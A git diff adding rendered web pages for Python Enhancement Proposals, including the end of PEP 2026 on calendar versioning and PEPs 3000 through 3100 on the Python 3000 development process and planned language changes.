We could skip the problematic 4.0 entirely and adopt SemVer. Because +deprecations are removed in every feature release, we would get a new major +bump every year.

+

This is rejected because we wouldn’t get the benefit of calendar versioning, and +moving away from 3.x would also break code.

+
+
+

Change during 3.14 cycle

+

The Python 3.14 release must go ahead because: π.

+
+
+
+

Backwards compatibility

+

This version change is the safest of the CalVer options considered +(see rejected ideas): we keep 3 as the major version, +and the minor version is still two digits. +The minor will eventually change to three digits but this is predictable, +a long way off and can be planned for.

+

We retain the python3 executable.

+
+

Version mapping

+

Versions 3.15 to 3.25 inclusive will be skipped. +Features, deprecations and removals planned for these will be remapped to the +new version numbers.

+

For example, a deprecation initially planned for removal in 3.16 will instead +be removed in 3.27.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Old versionNew versionInitial release
3.143.14 (no change)2025
3.153.262026
3.163.272027
3.173.282028
3.183.292029
3.193.302030
3.203.312031
3.213.322032
3.223.332033
3.233.342034
3.243.352035
3.253.362036
+
+
+
+

Forwards compatibility

+
+

Future change in cadence

+

This PEP proposes no change to the annual release cadence as defined in +PEP 602, which lays out +many good reasons for annual releases +(for example, smaller releases with a predictable release calendar, +and syncing with external redistributors). +However unlikely, should we decide to change the cadence in the future, CalVer +does not preclude doing so.

+
+

Less frequent

+

If we went to fewer than one release per year, the proposed CalVer scheme +still works; indeed, it even helps people know in which year to expect the +release. For example, if we released every second year starting in 2036:

+
    +
  • 3.36.0 would be released in 2036
  • +
  • 3.38.0 would be released in 2038
  • +
  • and so on
  • +
+

Ecosystem changes depend in part on how the the hypothetical cadence-changing +PEP updates PEP 387 (Backwards Compatibility Policy). If, for example, it +requires that the deprecation period must be at least one feature release and +not the current two (to maintain the minimum two years), CalVer has the benefit +over the status quo in requiring no changes to planned removal versions +(other than adjusting any falling in non-release years).

+
+
+

More frequent

+

If we went to more than one release per year, here are some options. +For example, if we released in April and October starting in 2036, the next +four releases could be:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SchemeNotes2036 a2036 b2037 a2037 b
YY.MM.microYear as major, month as minor36.04.036.10.037.04.037.10.0
YY.x.microYear as major, +serial number as minor36.1.036.2.037.1.037.2.0
3.YYMM.microCombine year and month +as minor3.3604.03.3610.03.3704.03.3710.0
3.YYx.microCombine year and serial number +as minor3.360.03.361.03.370.03.371.0
3.YY.MM.microAdd an extra month segment3.36.04.03.36.10.03.37.04.03.37.10.0
3.major.microNo more CalVer: +increment minor3.36.03.37.03.38.03.39.0
3.50.03.51.03.52.03.53.0
3.100.03.101.03.102.03.103.0
4.major.microNo more CalVer: +increment major4.0.04.1.04.2.04.3.0
5.major.micro5.0.05.1.05.2.05.3.0
+

The YY options would require addressing issues around the +platform compatibility tags, +the python3 command, and code +assuming the version always begins with 3.

+

The options keeping major version 3 but changing the minor to three or four +digits would also need to address code +assuming the version is always two digits.

+

The option adding an extra month segment is the biggest change as code would +need to deal with a four-part version instead of three.

+

The options dropping CalVer would be the most conservative +allowing the major and minor to be chosen freely.

+
+
+
+

No more CalVer

+

Adopting CalVer now does not preclude moving away CalVer in the future, +for example, back to the original scheme, to SemVer or another scheme. +Some options are listed in the table above. +If wanting to make it clear the minor is no longer the year, +it can be bumped to a higher round number (for example, 3.50 or 3.100) +or the major version can be bumped (for example, to 4.0 or 5.0). +Additionally, a version epoch +could be considered.

+
+
+
+

Footnotes

+

The author proposed calendar versioning at the Python Language Summit 2024; +this PEP is a result of discussions there and during PyCon US.

+

Read the slides +and blogpost +of the summit talk.

+
+
+

Acknowledgements

+

Thanks to Seth Michael Larson for the Language Summit Q&A notes and blogpost, +and to everyone who gave feedback at the summit and PyCon US.

+

Thank you to Łukasz Langa and Alex Waygood for reviewing a draft of this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-2026.rst

+

Last modified: 2024-09-26 00:34:23 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3000/index.html b/pep-3000/index.html new file mode 100644 index 00000000000..9a996f85db2 --- /dev/null +++ b/pep-3000/index.html @@ -0,0 +1,265 @@ + + + + + + + + PEP 3000 – Python 3000 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3000 – Python 3000

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
05-Apr-2006
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP sets guidelines for Python 3000 development. Ideally, we +first agree on the process, and start discussing features only after +the process has been decided and specified. In practice, we’ll be +discussing features and process simultaneously; often the debate about +a particular feature will prompt a process discussion.

+
+
+

Naming

+

Python 3000, Python 3.0 and Py3K are all names for the same thing. +The project is called Python 3000, or abbreviated to Py3k. The actual +Python release will be referred to as Python 3.0, and that’s +what “python3.0 -V” will print; the actual file names will use the +same naming convention we use for Python 2.x. I don’t want to pick a +new name for the executable or change the suffix for Python source +files.

+
+
+

PEP Numbering

+

Python 3000 PEPs are numbered starting at PEP 3000. PEPs 3000-3099 +are meta-PEPs – these can be either process or informational PEPs. +PEPs 3100-3999 are feature PEPs. PEP 3000 itself (this PEP) is +special; it is the meta-PEP for Python 3000 meta-PEPs (IOW it describe +the process to define processes). PEP 3100 is also special; it’s a +laundry list of features that were selected for (hopeful) inclusion in +Python 3000 before we started the Python 3000 process for real. PEP +3099, finally, is a list of features that will not change.

+
+
+

Timeline

+

See PEP 361, which contains the release schedule for Python +2.6 and 3.0. These versions will be released in lockstep.

+

Note: standard library development is expected to ramp up after 3.0a1 +is released.

+

I expect that there will be parallel Python 2.x and 3.x releases for +some time; the Python 2.x releases will continue for a longer time +than the traditional 2.x.y bugfix releases. Typically, we stop +releasing bugfix versions for 2.x once version 2.(x+1) has been +released. But I expect there to be at least one or two new 2.x +releases even after 3.0 (final) has been released, probably well into +3.1 or 3.2. This will to some extent depend on community demand for +continued 2.x support, acceptance and stability of 3.0, and volunteer +stamina.

+

I expect that Python 3.1 and 3.2 will be released much sooner after +3.0 than has been customary for the 2.x series. The 3.x release +pattern will stabilize once the community is happy with 3.x.

+
+
+

Compatibility and Transition

+

Python 3.0 will break backwards compatibility with Python 2.x.

+

There is no requirement that Python 2.6 code will run unmodified on +Python 3.0. Not even a subset. (Of course there will be a tiny +subset, but it will be missing major functionality.)

+

Python 2.6 will support forward compatibility in the following two +ways:

+
    +
  • It will support a “Py3k warnings mode” which will warn dynamically +(i.e. at runtime) about features that will stop working in Python +3.0, e.g. assuming that range() returns a list.
  • +
  • It will contain backported versions of many Py3k features, either +enabled through __future__ statements or simply by allowing old and +new syntax to be used side-by-side (if the new syntax would be a +syntax error in 2.x).
  • +
+

Instead, and complementary to the forward compatibility features in +2.6, there will be a separate source code conversion tool [1]. This +tool can do a context-free source-to-source translation. For example, +it can translate apply(f, args) into f(*args). However, the +tool cannot do data flow analysis or type inferencing, so it simply +assumes that apply in this example refers to the old built-in +function.

+

The recommended development model for a project that needs to support +Python 2.6 and 3.0 simultaneously is as follows:

+
    +
  1. You should have excellent unit tests with close to full coverage.
  2. +
  3. Port your project to Python 2.6.
  4. +
  5. Turn on the Py3k warnings mode.
  6. +
  7. Test and edit until no warnings remain.
  8. +
  9. Use the 2to3 tool to convert this source code to 3.0 syntax. +Do not manually edit the output!
  10. +
  11. Test the converted source code under 3.0.
  12. +
  13. If problems are found, make corrections to the 2.6 version +of the source code and go back to step 3.
  14. +
  15. When it’s time to release, release separate 2.6 and 3.0 tarballs +(or whatever archive form you use for releases).
  16. +
+

It is recommended not to edit the 3.0 source code until you are ready +to reduce 2.6 support to pure maintenance (i.e. the moment when you +would normally move the 2.6 code to a maintenance branch anyway).

+

PS. We need a meta-PEP to describe the transitional issues in detail.

+
+
+

Implementation Language

+

Python 3000 will be implemented in C, and the implementation will be +derived as an evolution of the Python 2 code base. This reflects my +views (which I share with Joel Spolsky [2]) on the dangers of complete +rewrites. Since Python 3000 as a language is a relatively mild +improvement on Python 2, we can gain a lot by not attempting to +reimplement the language from scratch. I am not against parallel +from-scratch implementation efforts, but my own efforts will be +directed at the language and implementation that I know best.

+
+
+

Meta-Contributions

+

Suggestions for additional text for this PEP are gracefully accepted +by the author. Draft meta-PEPs for the topics above and additional +topics are even more welcome!

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3000.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3001/index.html b/pep-3001/index.html new file mode 100644 index 00000000000..c5c16f391b5 --- /dev/null +++ b/pep-3001/index.html @@ -0,0 +1,232 @@ + + + + + + + + PEP 3001 – Procedure for reviewing and improving standard library modules | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3001 – Procedure for reviewing and improving standard library modules

+
+
Author:
+
Georg Brandl <georg at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Process
+
Created:
+
05-Apr-2006
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a procedure for reviewing and improving standard +library modules, especially those written in Python, making them ready +for Python 3000. There can be different steps of refurbishing, each +of which is described in a section below. Of course, not every step +has to be performed for every module.

+
+
+

Removal of obsolete modules

+

All modules marked as deprecated in 2.x versions should be removed for +Python 3000. The same applies to modules which are seen as obsolete today, +but are too widely used to be deprecated or removed. Python 3000 is the +big occasion to get rid of them.

+

There will have to be a document listing all removed modules, together +with information on possible substitutes or alternatives. This +information will also have to be provided by the python3warn.py porting +helper script mentioned in PEP XXX.

+
+
+

Renaming modules

+

There are proposals for a “great stdlib renaming” introducing a hierarchic +library namespace or a top-level package from which to import standard +modules. That possibility aside, some modules’ names are known to have +been chosen unwisely, a mistake which could never be corrected in the 2.x +series. Examples are names like “StringIO” or “Cookie”. For Python 3000, +there will be the possibility to give those modules less confusing and +more conforming names.

+

Of course, each rename will have to be stated in the documentation of +the respective module and perhaps in the global document of Step 1. +Additionally, the python3warn.py script will recognize the old module +names and notify the user accordingly.

+

If the name change is made in time for another release of the Python 2.x +series, it is worth considering to introduce the new name in the 2.x +branch to ease transition.

+
+
+

Code cleanup

+

As most library modules written in Python have not been touched except +for bug fixes, following the policy of never changing a running system, +many of them may contain code that is not up to the newest language +features and could be rewritten in a more concise, modern Python.

+

PyChecker should run cleanly over the library. With a carefully tuned +configuration file, PyLint should also emit as few warnings as possible.

+

As long as these changes don’t change the module’s interface and behavior, +no documentation updates are necessary.

+
+
+

Enhancement of test and documentation coverage

+

Code coverage by unit tests varies greatly between modules. Each test +suite should be checked for completeness, and the remaining classic tests +should be converted to PyUnit (or whatever new shiny testing framework +comes with Python 3000, perhaps py.test?).

+

It should also be verified that each publicly visible function has a +meaningful docstring which ideally contains several doctests.

+

No documentation changes are necessary for enhancing test coverage.

+
+
+

Unification of module metadata

+

This is a small and probably not very important step. There have been +various attempts at providing author, version and similar metadata in +modules (such as a “__version__” global). Those could be standardized +and used throughout the library.

+

No documentation changes are necessary for this step, too.

+
+
+

Backwards incompatible bug fixes

+

Over the years, many bug reports have been filed which complained about +bugs in standard library modules, but have subsequently been closed as +“Won’t fix” since a fix would have introduced a major incompatibility +which was not acceptable in the Python 2.x series. In Python 3000, the +fix can be applied if the interface per se is still acceptable.

+

Each slight behavioral change caused by such fixes must be mentioned in +the documentation, perhaps in a “Changed in Version 3.0” paragraph.

+
+
+

Interface changes

+

The last and most disruptive change is the overhaul of a module’s public +interface. If a module’s interface is to be changed, a justification +should be made beforehand, or a PEP should be written.

+

The change must be fully documented as “New in Version 3.0”, and the +python3warn.py script must know about it.

+
+
+

References

+

None yet.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3001.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3002/index.html b/pep-3002/index.html new file mode 100644 index 00000000000..7c6f91056b6 --- /dev/null +++ b/pep-3002/index.html @@ -0,0 +1,224 @@ + + + + + + + + PEP 3002 – Procedure for Backwards-Incompatible Changes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3002 – Procedure for Backwards-Incompatible Changes

+
+
Author:
+
Steven Bethard <steven.bethard at gmail.com>
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
27-Mar-2006
+
Post-History:
+
27-Mar-2006, 13-Apr-2006
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes the procedure for changes to Python that are +backwards-incompatible between the Python 2.X series and Python 3000. +All such changes must be documented by an appropriate Python 3000 PEP +and must be accompanied by code that can identify when pieces of +Python 2.X code may be problematic in Python 3000.

+
+
+

Rationale

+

Python 3000 will introduce a number of backwards-incompatible changes +to Python, mainly to streamline the language and to remove some +previous design mistakes. But Python 3000 is not intended to be a new +and completely different language from the Python 2.X series, and it +is expected that much of the Python user community will make the +transition to Python 3000 when it becomes available.

+

To encourage this transition, it is crucial to provide a clear and +complete guide on how to upgrade Python 2.X code to Python 3000 code. +Thus, for any backwards-incompatible change, two things are required:

+
    +
  • An official Python Enhancement Proposal (PEP)
  • +
  • Code that can identify pieces of Python 2.X code that may be +problematic in Python 3000
  • +
+
+
+

Python Enhancement Proposals

+

Every backwards-incompatible change must be accompanied by a PEP. +This PEP should follow the usual PEP guidelines and explain the +purpose and reasoning behind the backwards incompatible change. In +addition to the usual PEP sections, all PEPs proposing +backwards-incompatible changes must include an additional section: +Compatibility Issues. This section should describe what is backwards +incompatible about the proposed change to Python, and the major sorts +of breakage to be expected.

+

While PEPs must still be evaluated on a case-by-case basis, a PEP may +be inappropriate for Python 3000 if its Compatibility Issues section +implies any of the following:

+
    +
  • Most or all instances of a Python 2.X construct are incorrect in +Python 3000, and most or all instances of the Python 3000 construct +are incorrect in Python 2.X.

    So for example, changing the meaning of the for-loop else-clause +from “executed when the loop was not broken out of” to “executed +when the loop had zero iterations” would mean that all Python 2.X +for-loop else-clauses would be broken, and there would be no way to +use a for-loop else-clause in a Python-3000-appropriate manner. +Thus a PEP for such an idea would likely be rejected.

    +
  • +
  • Many instances of a Python 2.X construct are incorrect in Python +3000 and the PEP fails to demonstrate real-world use-cases for the +changes.

    Backwards incompatible changes are allowed in Python 3000, but not +to excess. A PEP that proposes backwards-incompatible changes +should provide good examples of code that visibly benefits from the +changes.

    +
  • +
+

PEP-writing is time-consuming, so when a number of +backwards-incompatible changes are closely related, they should be +proposed in the same PEP. Such PEPs will likely have longer +Compatibility Issues sections, however, since they must now describe +the sorts of breakage expected from all the proposed changes.

+
+
+

Identifying Problematic Code

+

In addition to the PEP requirement, backwards incompatible changes to +Python must also be accompanied by code to issue warnings for pieces +of Python 2.X code that will behave differently in Python 3000. Such +warnings will be enabled in Python 2.X using a new command-line +switch: -3. All backwards incompatible changes should be +accompanied by a patch for Python 2.X that, when -3 is +specified, issues warnings for each construct that is being changed.

+

For example, if dict.keys() returns an iterator in Python 3000, +the patch to the Python 2.X branch should do something like:

+
+
If -3 was specified, change dict.keys() to return a +subclass of list that issues warnings whenever you use any +methods other than __iter__().
+

Such a patch would mean that warnings are only issued when features +that will not be present in Python 3000 are used, and almost all +existing code should continue to work. (Code that relies on +dict.keys() always returning a list and not a subclass should +be pretty much non-existent.)

+
+
+

References

+

TBD

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3002.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3003/index.html b/pep-3003/index.html new file mode 100644 index 00000000000..7b393818522 --- /dev/null +++ b/pep-3003/index.html @@ -0,0 +1,304 @@ + + + + + + + + PEP 3003 – Python Language Moratorium | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3003 – Python Language Moratorium

+
+
Author:
+
Brett Cannon, Jesse Noller, Guido van Rossum
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
21-Oct-2009
+
Post-History:
+
03-Nov-2009
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a temporary moratorium (suspension) of all changes +to the Python language syntax, semantics, and built-ins for a period +of at least two years from the release of Python 3.1. In particular, the +moratorium would include Python 3.2 (to be released 18-24 months after +3.1) but allow Python 3.3 (assuming it is not released prematurely) to +once again include language changes.

+

This suspension of features is designed to allow non-CPython implementations +to “catch up” to the core implementation of the language, help ease adoption +of Python 3.x, and provide a more stable base for the community.

+
+
+

Rationale

+

This idea was proposed by Guido van Rossum on the python-ideas [1] mailing +list. The premise of his email was to slow the alteration of the Python core +syntax, builtins and semantics to allow non-CPython implementations to catch +up to the current state of Python, both 2.x and 3.x.

+

Python, as a language is more than the core implementation – +CPython – with a rich, mature and vibrant community of implementations, such +as Jython [2], IronPython [3] and PyPy [4] that are a benefit not only to +the community, but to the language itself.

+

Still others, such as Unladen Swallow [5] (a branch of CPython) seek not to +create an alternative implementation, but rather they seek to enhance the +performance and implementation of CPython itself.

+

Python 3.x was a large part of the last several years of Python’s +development. Its release, as well as a bevy of changes to the language +introduced by it and the previous 2.6.x releases, puts alternative +implementations at a severe disadvantage in “keeping pace” with core python +development.

+

Additionally, many of the changes put into the recent releases of the language +as implemented by CPython have not yet seen widespread usage by the +general user population. For example, most users are limited to the version +of the interpreter (typically CPython) which comes pre-installed with their +operating system. Most OS vendors are just barely beginning to ship Python 2.6 +– even fewer are shipping Python 3.x.

+

As it is expected that Python 2.7 be the effective “end of life” of the Python +2.x code line, with Python 3.x being the future, it is in the best interest of +Python core development to temporarily suspend the alteration of the language +itself to allow all of these external entities to catch up and to assist in +the adoption of, and migration to, Python 3.x

+

Finally, the moratorium is intended to free up cycles within core development +to focus on other issues, such as the CPython interpreter and improvements +therein, the standard library, etc.

+

This moratorium does not allow for exceptions – once accepted, any pending +changes to the syntax or semantics of the language will be postponed until the +moratorium is lifted.

+

This moratorium does not attempt to apply to any other Python implementation +meaning that if desired other implementations may add features which deviate +from the standard implementation.

+
+
+

Details

+
+

Cannot Change

+
    +
  • New built-ins
  • +
  • +
    Language syntax
    The grammar file essentially becomes immutable apart from ambiguity +fixes.
    +
    +
  • +
  • +
    General language semantics
    The language operates as-is with only specific exemptions (see +below).
    +
    +
  • +
  • +
    New __future__ imports
    These are explicitly forbidden, as they effectively change the language +syntax and/or semantics (albeit using a compiler directive).
    +
    +
  • +
+
+
+

Case-by-Case Exemptions

+
    +
  • +
    New methods on built-ins
    The case for adding a method to a built-in object can be made.
    +
    +
  • +
  • +
    Incorrect language semantics
    If the language semantics turn out to be ambiguous or improperly +implemented based on the intention of the original design then the +semantics may change.
    +
    +
  • +
  • +
    Language semantics that are difficult to implement
    Because other VMs have not begun implementing Python 3.x semantics +there is a possibility that certain semantics are too difficult to +replicate. In those cases they can be changed to ease adoption of +Python 3.x by the other VMs.
    +
    +
  • +
+
+
+

Allowed to Change

+
    +
  • +
    C API
    It is entirely acceptable to change the underlying C code of +CPython as long as other restrictions of this moratorium are not +broken. E.g. removing the GIL would be fine assuming certain +operations that are currently atomic remain atomic.
    +
    +
  • +
  • +
    The standard library
    As the standard library is not directly tied to the language +definition it is not covered by this moratorium.
    +
    +
  • +
  • +
    Backports of 3.x features to 2.x
    The moratorium only affects features that would be new in 3.x.
    +
    +
  • +
  • +
    Import semantics
    For example, PEP 382. After all, import semantics vary between +Python implementations anyway.
    +
    +
  • +
+
+
+
+

Retroactive

+

It is important to note that the moratorium covers all changes since the release +of Python 3.1. This rule is intended to avoid features being rushed or smuggled +into the CPython source tree while the moratorium is being discussed. A review +of the NEWS file for the py3k development branch showed no commits would need to +be rolled back in order to meet this goal.

+
+
+

Extensions

+

The time period of the moratorium can only be extended through a new PEP.

+
+ +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3003.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3099/index.html b/pep-3099/index.html new file mode 100644 index 00000000000..bf32b9c5836 --- /dev/null +++ b/pep-3099/index.html @@ -0,0 +1,313 @@ + + + + + + + + PEP 3099 – Things that will Not Change in Python 3000 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3099 – Things that will Not Change in Python 3000

+
+
Author:
+
Georg Brandl <georg at python.org>
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
04-Apr-2006
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Some ideas are just bad. While some thoughts on Python evolution are +constructive, some go against the basic tenets of Python so +egregiously that it would be like asking someone to run in a circle: +it gets you nowhere, even for Python 3000, where extraordinary +proposals are allowed. This PEP tries to list all BDFL pronouncements +on Python 3000 that refer to changes that will not happen and new +features that will not be introduced, sorted by topics, along with +a short explanation or a reference to the relevant thread on the +python-3000 mailing list.

+

If you think you should suggest any of the listed ideas it would be +better to just step away from the computer, go outside, and enjoy +yourself. Being active outdoors by napping in a nice patch of grass +is more productive than bringing up a beating-a-dead-horse idea and +having people tell you how dead the idea is. Consider yourself warned.

+
+
+

Core language

+ +
+
+

Builtins

+ +
+
+

Standard types

+ +
+
+

Coding style

+ +
+
+

Interactive Interpreter

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3099.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3100/index.html b/pep-3100/index.html new file mode 100644 index 00000000000..4400853ddf7 --- /dev/null +++ b/pep-3100/index.html @@ -0,0 +1,570 @@ + + + + + + + + PEP 3100 – Miscellaneous Python 3.0 Plans | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3100 – Miscellaneous Python 3.0 Plans

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
20-Aug-2004
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP, previously known as PEP 3000, describes smaller scale changes +and new features for which no separate PEP is written yet, all targeted +for Python 3000.

+

The list of features included in this document is subject to change +and isn’t binding on the Python development community; features may be +added, removed, and modified at any time. The purpose of this list is +to focus our language development effort on changes that are steps to +3.0, and to encourage people to invent ways to smooth the transition.

+

This document is not a wish-list that anyone can extend. While there +are two authors of this PEP, we’re just supplying the text; the +decisions for which changes are listed in this document are made by +Guido van Rossum, who has chosen them as goals for Python 3.0.

+

Guido’s pronouncements on things that will not change in Python 3.0 +are recorded in PEP 3099.

+
+
+

General goals

+

A general goal is to reduce feature duplication by removing old ways +of doing things. A general principle of the design will be that one +obvious way of doing something is enough. [1]

+
+
+

Influencing PEPs

+
    +
  • PEP 238 (Changing the Division Operator)
  • +
  • PEP 328 (Imports: Multi-Line and Absolute/Relative)
  • +
  • PEP 343 (The “with” Statement)
  • +
  • PEP 352 (Required Superclass for Exceptions)
  • +
+
+
+

Style changes

+
    +
  • The C style guide will be updated to use 4-space indents, never tabs. +This style should be used for all new files; existing files can be +updated only if there is no hope to ever merge a particular file from +the Python 2 HEAD. Within a file, the indentation style should be +consistent. No other style guide changes are planned ATM.
  • +
+
+
+

Core language

+
    +
  • True division becomes default behavior PEP 238 [done]
  • +
  • exec as a statement is not worth it – make it a function [done]
  • +
  • Add optional declarations for static typing PEP 3107 [10] [done]
  • +
  • Support only new-style classes; classic classes will be gone [1] [done]
  • +
  • Replace print by a function [14] PEP 3105 [done]
  • +
  • The softspace attribute of files goes away. [done]
  • +
  • Use except E1, E2, E3 as err: if you want the error variable. [3] [done]
  • +
  • None becomes a keyword [4]; also True and False [done]
  • +
  • ... to become a general expression element [16] [done]
  • +
  • as becomes a keyword [5] (starting in 2.6 already) [done]
  • +
  • Have list comprehensions be syntactic sugar for passing an +equivalent generator expression to list(); as a consequence the +loop variable will no longer be exposed PEP 289 [done]
  • +
  • Comparisons other than == and != between disparate types +will raise an exception unless explicitly supported by the type [6] [done]
  • +
  • floats will not be acceptable as arguments in place of ints for operations +where floats are inadvertently accepted (PyArg_ParseTuple() i & l formats)
  • +
  • Remove from … import * at function scope. [done] This means that functions +can always be optimized and support for unoptimized functions can go away.
  • +
  • +
    Imports PEP 328
      +
    • Imports will be absolute by default. [done]
    • +
    • Relative imports must be explicitly specified. [done]
    • +
    • Indirection entries in sys.modules (i.e., a value of None for +A.string means to use the top-level string module) will not be +supported.
    • +
    +
    +
    +
  • +
  • __init__.py might become optional in sub-packages? __init__.py will still +be required for top-level packages.
  • +
  • Cleanup the Py_InitModule() variants {,3,4} (also import and parser APIs)
  • +
  • Cleanup the APIs exported in pythonrun, etc.
  • +
  • Some expressions will require parentheses that didn’t in 2.x:
      +
    • List comprehensions will require parentheses around the iterables. +This will make list comprehensions more similar to generator comprehensions. +[x for x in 1, 2] will need to be: [x for x in (1, 2)] [done]
    • +
    • Lambdas may have to be parenthesized PEP 308 [NO]
    • +
    +
  • +
  • In order to get rid of the confusion between __builtin__ and __builtins__, +it was decided to rename __builtin__ (the module) to builtins, and to leave +__builtins__ (the sandbox hook) alone. [33] [34] [done]
  • +
  • Attributes on functions of the form func_whatever will be renamed +__whatever__ [17] [done]
  • +
  • Set literals and comprehensions [19] [20] [done] +{x} means set([x]); {x, y} means set([x, y]). +{F(x) for x in S if P(x)} means set(F(x) for x in S if P(x)). +NB. {range(x)} means set([range(x)]), NOT set(range(x)). +There’s no literal for an empty set; use set() (or {1}&{2} :-). +There’s no frozenset literal; they are too rarely needed.
  • +
  • The __nonzero__ special method will be renamed to __bool__ +and have to return a bool. The typeobject slot will be called +tp_bool [23] [done]
  • +
  • Dict comprehensions, as first proposed in PEP 274 [done] +{K(x): V(x) for x in S if P(x)} means dict((K(x), V(x)) for x in S if P(x)).
  • +
+

To be removed:

+
    +
  • String exceptions: use instances of an Exception class [2] [done]
  • +
  • raise Exception, "message": use raise Exception("message") [12] +[done]
  • +
  • x: use repr(x) [2] [done]
  • +
  • The <> operator: use != instead [3] [done]
  • +
  • The __mod__ and __divmod__ special methods on float. [they should stay] [21]
  • +
  • Drop unbound methods [7] [26] [done]
  • +
  • METH_OLDARGS [done]
  • +
  • WITH_CYCLE_GC [done]
  • +
  • __getslice__, __setslice__, __delslice__ [32]; +remove slice opcodes and use slice objects. [done]
  • +
  • __oct__, __hex__: use __index__ in oct() and hex() +instead. [done]
  • +
  • __methods__ and __members__ [done]
  • +
  • C APIs (see code): +PyFloat_AsString, PyFloat_AsReprString, PyFloat_AsStringEx, +PySequence_In, PyEval_EvalFrame, PyEval_CallObject, +_PyObject_Del, _PyObject_GC_Del, _PyObject_GC_Track, _PyObject_GC_UnTrack +PyString_AsEncodedString, PyString_AsDecodedString +PyArg_NoArgs, PyArg_GetInt, intargfunc, intintargfunc

    PyImport_ReloadModule ?

    +
  • +
+
+
+

Atomic Types

+
    +
  • Remove distinction between int and long types; ‘long’ built-in type and +literals with ‘L’ or ‘l’ suffix disappear [1] [done]
  • +
  • Make all strings be Unicode, and have a separate bytes() type [1] +The new string type will be called ‘str’. See PEP 3137. [done]
  • +
  • Return iterable views instead of lists where appropriate for atomic +type methods (e.g. dict.keys(), dict.values(), +dict.items(), etc.); iter* methods will be removed. [done]
  • +
  • Make string.join() stringify its arguments? [18] [NO]
  • +
  • Fix open() so it returns a ValueError if the mode is bad rather than IOError. +[done]
  • +
+

To be removed:

+
    +
  • basestring.find() and basestring.rfind(); use basestring.index() +or basestring.[r]partition() or +basestring.rindex() in a try/except block??? [13] [UNLIKELY]
  • +
  • file.xreadlines() method [31] [done]
  • +
  • dict.setdefault()? [15] [UNLIKELY]
  • +
  • dict.has_key() method; use in operator [done]
  • +
  • list.sort() and builtin.sorted() methods: eliminate cmp +parameter [27] [done]
  • +
+
+
+

Built-in Namespace

+
    +
  • Make built-ins return an iterator where appropriate (e.g. range(), +zip(), map(), filter(), etc.) [done]
  • +
  • Remove input() and rename raw_input() to input(). +If you need the old input(), use eval(input()). [done]
  • +
  • Introduce trunc(), which would call the __trunc__() method on its +argument; suggested use is for objects like float where calling __int__() +has data loss, but an integral representation is still desired? [8] [done]
  • +
  • Exception hierarchy changes PEP 352 [done]
  • +
  • Add a bin() function for a binary representation of integers [done]
  • +
+

To be removed:

+
    +
  • apply(): use f(*args, **kw) instead [2] [done]
  • +
  • buffer(): must die (use a bytes() type instead) (?) [2] [done]
  • +
  • callable(): just use isinstance(x, collections.Callable) (?) [2] [done]
  • +
  • compile(): put in sys (or perhaps in a module of its own) [2]
  • +
  • coerce(): no longer needed [2] [done]
  • +
  • execfile(), reload(): use exec() [2] [done]
  • +
  • intern(): put in sys [2], [22] [done]
  • +
  • reduce(): put in functools, a loop is more readable most of the +times [2], [9] [done]
  • +
  • xrange(): use range() instead [1] [See range() above] [done]
  • +
  • +
